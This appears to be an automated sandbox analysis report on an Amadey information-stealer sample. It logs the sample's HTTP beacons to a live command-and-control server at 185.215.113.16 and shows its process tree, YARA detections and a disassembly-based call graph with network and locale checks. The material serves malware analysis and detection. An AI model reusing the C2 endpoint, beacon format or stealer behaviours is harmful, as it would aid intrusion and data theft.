                          Sep 26, 2024 17:07:11.361682892 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          64 | 192.168.2.4 | 55714 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:11.371324062 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:12.076751947 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          65 | 192.168.2.4 | 55715 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:12.199443102 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:12.920315981 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          66 | 192.168.2.4 | 55716 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:07:12.929547071 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:13.653835058 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Target ID:0
                          Start time:11:05:05
                          Start date:26/09/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x500000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1726972956.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1767879458.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:11:05:08
                          Start date:26/09/2024
                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                          Imagebase:0x2b0000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1755618042.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1795993129.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 53%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:11:05:08
                          Start date:26/09/2024
                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Imagebase:0x2b0000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1759465892.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1799745219.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:11:06:00
                          Start date:26/09/2024
                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Imagebase:0x2b0000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2268716495.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false


                            Execution Graph

                            Execution Coverage:7.2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.9%
                            Total number of Nodes:546
                            Total number of Limit Nodes:31
12827->12837 12828 2b3185 12829 2cc19a 7 API calls 12828->12829 12830 2b318b 12829->12830 12831 2cc19a 7 API calls 12830->12831 12832 2b3191 12831->12832 12833 2cc19a 7 API calls 12832->12833 12839 2b3153 __Mtx_unlock 12833->12839 12834 2b3167 12834->12799 12835 2cc19a 7 API calls 12836 2b319d 12835->12836 12837->12828 12837->12830 12837->12834 12838 2cc5dc GetSystemTimePreciseAsFileTime 12837->12838 12840 2b311f 12838->12840 12839->12834 12839->12835 12840->12828 12840->12832 12840->12839 12842 2cbc7c 12840->12842 12845 2cbaa2 12842->12845 12844 2cbc8c 12844->12840 12846 2cbacc 12845->12846 12847 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 12846->12847 12848 2cbad4 __Xtime_diff_to_millis2 12846->12848 12849 2cbaff __Xtime_diff_to_millis2 12847->12849 12848->12844 12849->12848 12850 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 12849->12850 12850->12848 12852 2b2bce 12851->12852 12858 2cb777 12852->12858 12854 2b2c02 12855 2b2c09 12854->12855 12864 2b2c40 12854->12864 12855->12797 12857 2b2c18 std::_Xinvalid_argument 12859 2cb7a3 Concurrency::details::_Reschedule_chore 12858->12859 12860 2cb784 12858->12860 12859->12854 12867 2ccaa7 12860->12867 12862 2cb794 12862->12859 12869 2cb74e 12862->12869 12875 2cb72b 12864->12875 12866 2b2c72 shared_ptr 12866->12857 12868 2ccac2 CreateThreadpoolWork 12867->12868 12868->12862 12870 2cb757 Concurrency::details::_Reschedule_chore 12869->12870 12873 2cccfc 12870->12873 12872 2cb771 12872->12859 12874 2ccd11 TpPostWork 12873->12874 12874->12872 12876 2cb747 12875->12876 12877 2cb737 12875->12877 12876->12866 12877->12876 12879 2cc9a8 12877->12879 12880 2cc9bd TpReleaseWork 12879->12880 12880->12876 12505 2cb85e 12510 2cb6e5 12505->12510 12507 2cb886 12518 2cb648 12507->12518 12509 2cb89f 12511 2cb6f1 Concurrency::details::_Reschedule_chore 12510->12511 12512 2cb722 12511->12512 12528 2cc5dc 12511->12528 12512->12507 12516 2cb70c __Mtx_unlock 12517 2b2ad0 7 API calls 12516->12517 12517->12512 12519 2cb654 
Concurrency::details::_Reschedule_chore 12518->12519 12520 2cc5dc GetSystemTimePreciseAsFileTime 12519->12520 12521 2cb6ae 12519->12521 12522 2cb669 12520->12522 12521->12509 12523 2b2ad0 7 API calls 12522->12523 12524 2cb66f __Mtx_unlock 12523->12524 12525 2b2ad0 7 API calls 12524->12525 12526 2cb68c __Cnd_broadcast 12525->12526 12526->12521 12527 2b2ad0 7 API calls 12526->12527 12527->12521 12536 2cc382 12528->12536 12530 2cb706 12531 2b2ad0 12530->12531 12532 2b2ada 12531->12532 12533 2b2adc 12531->12533 12532->12516 12553 2cc19a 12533->12553 12537 2cc3d8 12536->12537 12539 2cc3aa 12536->12539 12537->12539 12542 2cce9b 12537->12542 12539->12530 12540 2cc42d __Xtime_diff_to_millis2 12540->12539 12541 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 12540->12541 12541->12540 12543 2cceb7 __aulldvrm 12542->12543 12544 2cceaa 12542->12544 12543->12540 12544->12543 12546 2cce74 12544->12546 12549 2ccb1a 12546->12549 12550 2ccb2b GetSystemTimePreciseAsFileTime 12549->12550 12551 2ccb37 12549->12551 12550->12551 12551->12543 12554 2cc1c2 12553->12554 12555 2cc1a4 12553->12555 12554->12554 12555->12554 12557 2cc1c7 12555->12557 12560 2b2aa0 12557->12560 12559 2cc1de std::_Xinvalid_argument 12559->12555 12574 2cbe0f 12560->12574 12562 2b2abf 12562->12559 12563 2e8aaf __fassign 2 API calls 12564 2e6c26 12563->12564 12565 2e6c35 12564->12565 12566 2e6c43 12564->12566 12567 2e6c99 6 API calls 12565->12567 12568 2e68bd 2 API calls 12566->12568 12570 2e6c3f 12567->12570 12571 2e6c5d 12568->12571 12569 2b2ab4 12569->12562 12569->12563 12570->12559 12572 2e6c99 6 API calls 12571->12572 12573 2e6c71 ___free_lconv_mon 12571->12573 12572->12573 12573->12559 12577 2ccb61 12574->12577 12578 2ccb6f InitOnceExecuteOnce 12577->12578 12580 2cbe22 12577->12580 12578->12580 12580->12569 12881 2e6559 12882 2e63f7 __fassign 2 API calls 12881->12882 12883 2e656a 12882->12883 12786 2e6974 12787 2e698c 12786->12787 12788 2e6982 12786->12788 12789 2e68bd 2 API calls 12787->12789 12790 2e69a6 
___free_lconv_mon 12789->12790 12495 2be410 12496 2be435 12495->12496 12498 2be419 12495->12498 12498->12496 12499 2be270 12498->12499 12500 2be280 __dosmaperr 12499->12500 12501 2e8979 2 API calls 12500->12501 12503 2be2bd std::_Xinvalid_argument 12501->12503 12502 2be435 12502->12498 12503->12502 12504 2be270 2 API calls 12503->12504 12504->12503 12581 2b86b0 12582 2b86b6 12581->12582 12583 2b86d6 12582->12583 12584 2e66e7 2 API calls 12582->12584 12585 2b86d0 12584->12585 12895 2bdfd0 recv 12896 2be032 recv 12895->12896 12897 2be067 recv 12896->12897 12898 2be0a1 12897->12898 12899 2be1c3 12898->12899 12900 2cc5dc GetSystemTimePreciseAsFileTime 12898->12900 12901 2be1fe 12900->12901 12902 2cc19a 7 API calls 12901->12902 12903 2be268 12902->12903 12376 2c1dd0 12379 2c1e6b shared_ptr __dosmaperr 12376->12379 12377 2be440 5 API calls 12378 2c2936 shared_ptr std::_Xinvalid_argument 12377->12378 12379->12378 12386 2c1e78 12379->12386 12391 2e8979 12379->12391 12381 2c2265 shared_ptr 12381->12378 12381->12386 12395 2e66e7 12381->12395 12383 2c268b shared_ptr __dosmaperr 12383->12378 12384 2e8979 2 API calls 12383->12384 12385 2c2759 12384->12385 12385->12378 12385->12386 12387 2c27d1 12385->12387 12386->12377 12399 2be440 12387->12399 12389 2c2843 12389->12378 12412 2b5df0 12389->12412 12392 2e8994 12391->12392 12419 2e86d7 12392->12419 12394 2e899e 12394->12381 12397 2e66f3 12395->12397 12396 2e66fd __cftof __dosmaperr 12396->12383 12397->12396 12443 2e6670 12397->12443 12400 2be489 12399->12400 12466 2bbd60 12400->12466 12402 2be9a9 shared_ptr 12402->12389 12403 2be711 12403->12402 12404 2be440 5 API calls 12403->12404 12406 2bf696 12404->12406 12405 2bf892 shared_ptr 12405->12389 12406->12405 12407 2be440 5 API calls 12406->12407 12409 2bf973 12407->12409 12408 2bfa45 shared_ptr 12408->12389 12409->12408 12410 2be440 5 API calls 12409->12410 12411 2c054c shared_ptr 12410->12411 12411->12389 12414 2b5e28 12412->12414 12413 2b5f0e shared_ptr 12413->12378 12414->12413 
12415 2b6060 RegOpenKeyExA 12414->12415 12417 2b645a shared_ptr 12415->12417 12418 2b60b3 __cftof 12415->12418 12416 2b6153 RegEnumValueW 12416->12418 12417->12378 12418->12416 12418->12417 12420 2e86e9 12419->12420 12421 2e683a __fassign 2 API calls 12420->12421 12422 2e86fe __cftof __dosmaperr 12420->12422 12423 2e872e 12421->12423 12422->12394 12423->12422 12425 2e8925 12423->12425 12426 2e8962 12425->12426 12427 2e8932 12425->12427 12436 2ed2e9 12426->12436 12430 2e8941 __fassign 12427->12430 12431 2ed30d 12427->12431 12430->12423 12432 2e683a __fassign 2 API calls 12431->12432 12433 2ed32a 12432->12433 12435 2ed33a 12433->12435 12440 2ef07f 12433->12440 12435->12430 12437 2ed2f4 12436->12437 12438 2eb4bb __fassign 2 API calls 12437->12438 12439 2ed304 12438->12439 12439->12430 12441 2e683a __fassign 2 API calls 12440->12441 12442 2ef09f __cftof __fassign __freea 12441->12442 12442->12435 12444 2e6692 12443->12444 12446 2e667d __cftof __dosmaperr ___free_lconv_mon 12443->12446 12444->12446 12447 2e9ef9 12444->12447 12446->12396 12448 2e9f11 12447->12448 12450 2e9f36 12447->12450 12448->12450 12451 2f02f8 12448->12451 12450->12446 12452 2f0304 12451->12452 12454 2f030c __cftof __dosmaperr 12452->12454 12455 2f03ea 12452->12455 12454->12450 12456 2f040c 12455->12456 12458 2f0410 __cftof __dosmaperr 12455->12458 12456->12458 12459 2efb7f 12456->12459 12458->12454 12460 2efbcc 12459->12460 12461 2e683a __fassign 2 API calls 12460->12461 12465 2efbdb __cftof 12461->12465 12462 2efe7b 12462->12458 12463 2ed2e9 2 API calls 12463->12465 12464 2ec4ea GetPEB GetPEB __fassign 12464->12465 12465->12462 12465->12463 12465->12464 12467 2bbdb2 12466->12467 12469 2bc14e shared_ptr 12466->12469 12468 2bbdc6 InternetOpenW InternetConnectA 12467->12468 12467->12469 12470 2bbe3d 12468->12470 12469->12403 12471 2bbe53 HttpOpenRequestA 12470->12471 12472 2bbe71 shared_ptr 12471->12472 12473 2bbf13 HttpSendRequestA 12472->12473 12475 2bbf2b shared_ptr 12473->12475 12474 2bbfb3 
InternetReadFile 12476 2bbfda 12474->12476 12475->12474 12780 2c9310 12781 2c9325 12780->12781 12782 2c9363 12780->12782 12783 2cd041 SleepConditionVariableCS 12781->12783 12784 2c932f 12783->12784 12784->12782 12785 2ccff7 RtlWakeAllConditionVariable 12784->12785 12785->12782

                            Control-flow Graph (function 2bbd60)
                            APIs
                            • InternetOpenW.WININET(00308D70,00000000,00000000,00000000,00000000), ref: 002BBDED
                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
                            • HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
                            • HttpSendRequestA.WININET(?,00000000), ref: 002BBF1B
                            • InternetReadFile.WININET(?,?,000003FF,?), ref: 002BBFCD
                            • InternetCloseHandle.WININET(?), ref: 002BC0A7
                            • InternetCloseHandle.WININET(?), ref: 002BC0AF
                            • InternetCloseHandle.WININET(?), ref: 002BC0B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2b0000_axplong.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                            • String ID: 0$8KG0fCKZFzY=$8KG0fymoFx==$@$RHYTYv==$RpKt$d41$invalid stoi argument$stoi argument out of range
                            • API String ID: 688256393-3706228242
                            • Opcode ID: 7e0e19bc6a8fa6cf2822411288ddaaf3dc6196fc5431fa0691330f47a9750e10
                            • Instruction ID: 1e06aff6be7718910f272956000be99078cb2b7d8b407d5798250795e05543f1
                            • Opcode Fuzzy Hash: 7e0e19bc6a8fa6cf2822411288ddaaf3dc6196fc5431fa0691330f47a9750e10
                            • Instruction Fuzzy Hash: 90B1E5B16201189BEB29DF28CC85BEEBB79EF45344F5041ADF50897282D7719AD0CF94
                            APIs
                              • Part of subcall function 002C7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
                              • Part of subcall function 002C7870: __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
                              • Part of subcall function 002C7870: __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971
                              • Part of subcall function 002BBD60: InternetOpenW.WININET(00308D70,00000000,00000000,00000000,00000000), ref: 002BBDED
                              • Part of subcall function 002BBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
                              • Part of subcall function 002BBD60: HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
                            • std::_Xinvalid_argument.LIBCPMT ref: 002C4EA2
                            Strings
                            Yara matches
                            Similarity
                            • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                            • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-1
                            • API String ID: 2414744145-770670542
                            • Opcode ID: d6ca47de548b0d4e3a4c7aef008bd68d7f3e8298a75e681806d904ee5a97c570
                            • Instruction ID: 438616c867a9d31760a0d36af66050e5e184b0c858123581563aabe03be6fefe
                            • Opcode Fuzzy Hash: d6ca47de548b0d4e3a4c7aef008bd68d7f3e8298a75e681806d904ee5a97c570
                            • Instruction Fuzzy Hash: 212335709201589BEB19DB28CD89B9DBB769F85304F5482DCE009AB2C2DB359FE4CF51

                            Control-flow Graph (function 2b5df0)
                            Strings
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                            • API String ID: 0-3963862150
                            • Opcode ID: 1041502a045b2a6caeb03cf6bd32233fafd2bbf6b0501e4cd76fcec85d293510
                            • Instruction ID: 0f0475b0bfe0f711a3ed3198878ec702bc9db147abf677dbaa9dcdb397e023ad
                            • Opcode Fuzzy Hash: 1041502a045b2a6caeb03cf6bd32233fafd2bbf6b0501e4cd76fcec85d293510
                            • Instruction Fuzzy Hash: 10E1AD71910218ABEB25DFA4CC88BDEB779AF04344F5042D9E508A7291DB74ABD4CF91

                            Control-flow Graph (function 2b7d00)
                            APIs
                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002B7EA3
                            Strings
                            Yara matches
                            Similarity
                            • API ID: InfoNativeSystem
                            • String ID: 8$JmpxQb==$JmpxRL==$JmpyPb==$X
                            • API String ID: 1721193555-4251415508
                            • Opcode ID: d2b1708fb0addb7403afdcba34f9299277edb83b7fd348a9b0dda4c7dadd17ff
                            • Instruction ID: ca4e4b2fb5032e3ed0f8b21861718404108ef87fa07f2ada8845e61ad44b117b
                            • Opcode Fuzzy Hash: d2b1708fb0addb7403afdcba34f9299277edb83b7fd348a9b0dda4c7dadd17ff
                            • Instruction Fuzzy Hash: 4CD13570E206549BDF15BF28CC4A7DD7B65AB46350F90429CE8196B3C2DB358EB08BD2

                            Control-flow Graph (function 2b82b0)
                            APIs
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 002B8454
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • Associated: 00000006.00000002.2978532944.00000000002B0000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978563090.0000000000312000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978647713.0000000000319000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.000000000031B000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.0000000000584000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005B0000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005B9000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2978679758.00000000005C8000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979076770.00000000005C9000.00000080.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979624431.0000000000769000.00000040.00000001.01000000.00000007.sdmp
                            • Associated: 00000006.00000002.2979657065.000000000076B000.00000080.00000001.01000000.00000007.sdmp
                            • API ID: InfoNativeSystem
                            • String ID: 8$X
                            • API String ID: 1721193555-374791910
                            • Opcode ID: 045ab10928cac677c9b5118cc07746536f8679f714b39baf341061cc86d29184
                            • Instruction ID: 81e95bc66f84c4352145a83eb5384b931df6f6bb4bcedaefc69b907bcb082237
                            • Opcode Fuzzy Hash: 045ab10928cac677c9b5118cc07746536f8679f714b39baf341061cc86d29184
                            • Instruction Fuzzy Hash: B4514C70D202199BEB14EF24CD45BDEB779EB45344F5042A9E808A72C1EF715AE0CF91

                            Control-flow Graph

                            control_flow_graph 1187 2e6e01-2e6e36 GetFileType 1188 2e6eee-2e6ef1 1187->1188 1189 2e6e3c-2e6e47 1187->1189 1192 2e6f1a-2e6f42 1188->1192 1193 2e6ef3-2e6ef6 1188->1193 1190 2e6e69-2e6e85 call 2e4020 GetFileInformationByHandle 1189->1190 1191 2e6e49-2e6e5a call 2e7177 1189->1191 1203 2e6f0b-2e6f18 call 2e740d 1190->1203 1208 2e6e8b-2e6ecd call 2e70c9 call 2e6f71 * 3 1190->1208 1205 2e6f07-2e6f09 1191->1205 1206 2e6e60-2e6e67 1191->1206 1194 2e6f5f-2e6f61 1192->1194 1195 2e6f44-2e6f57 1192->1195 1193->1192 1198 2e6ef8-2e6efa 1193->1198 1200 2e6f62-2e6f70 call 2ccf21 1194->1200 1195->1194 1210 2e6f59-2e6f5c 1195->1210 1202 2e6efc-2e6f01 call 2e7443 1198->1202 1198->1203 1202->1205 1203->1205 1205->1200 1206->1190 1223 2e6ed2-2e6eea call 2e7096 1208->1223 1210->1194 1223->1194 1226 2e6eec 1223->1226 1226->1205
                            APIs
                            • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 002E6E23
                            • GetFileInformationByHandle.KERNELBASE(?,?), ref: 002E6E7D
                            • __dosmaperr.LIBCMT ref: 002E6F12
                              • Part of subcall function 002E7177: __dosmaperr.LIBCMT ref: 002E71AC
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID: File__dosmaperr$HandleInformationType
                            • String ID:
                            • API String ID: 2531987475-0
                            • Opcode ID: a2a5d2619c1f778cd7a54b0f31462c3cf18e9f5f4870a76ba20fd1fb7c81320a
                            • Instruction ID: 82449bb143fe3c34f5b3a6c6b661611d69e085c0228990ca6e6f06e61e225894
                            • Opcode Fuzzy Hash: a2a5d2619c1f778cd7a54b0f31462c3cf18e9f5f4870a76ba20fd1fb7c81320a
                            • Instruction Fuzzy Hash: 1D41AF75960385ABDB24EFB6EC459AFBBF9EF98340B50442DF456D3610E730A924CB20

                            Control-flow Graph

                            control_flow_graph 1435 2e6c99-2e6ca5 1436 2e6ca7-2e6cc3 call 2e7430 call 2e7443 call 2e6b8a 1435->1436 1437 2e6cc4-2e6ce8 call 2e4020 1435->1437 1443 2e6cea-2e6d04 call 2e7430 call 2e7443 call 2e6b8a 1437->1443 1444 2e6d06-2e6d28 CreateFileW 1437->1444 1467 2e6d72-2e6d76 1443->1467 1447 2e6d2a-2e6d2e call 2e6e01 1444->1447 1448 2e6d38-2e6d3f call 2e6d77 1444->1448 1453 2e6d33-2e6d36 1447->1453 1457 2e6d40-2e6d42 1448->1457 1453->1457 1459 2e6d64-2e6d67 1457->1459 1460 2e6d44-2e6d61 call 2e4020 1457->1460 1463 2e6d69-2e6d6f 1459->1463 1464 2e6d70 1459->1464 1460->1459 1463->1464 1464->1467
                            Memory Dump Source
                            • Source File: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0244536d2a62407776bf74cd7adfc90bbc11cc63997839ee1b250d787d5c369f
                            • Instruction ID: 1242d65ff2e5c73e039ae0cba7bbcb480f18fd2397d6bcda8f47d2b6394c99fb
                            • Opcode Fuzzy Hash: 0244536d2a62407776bf74cd7adfc90bbc11cc63997839ee1b250d787d5c369f
                            • Instruction Fuzzy Hash: E1212B329A12487AEB117F66AC45B9F37299F417B8F900310F9243B1D1D7706E219AA1

                            Control-flow Graph

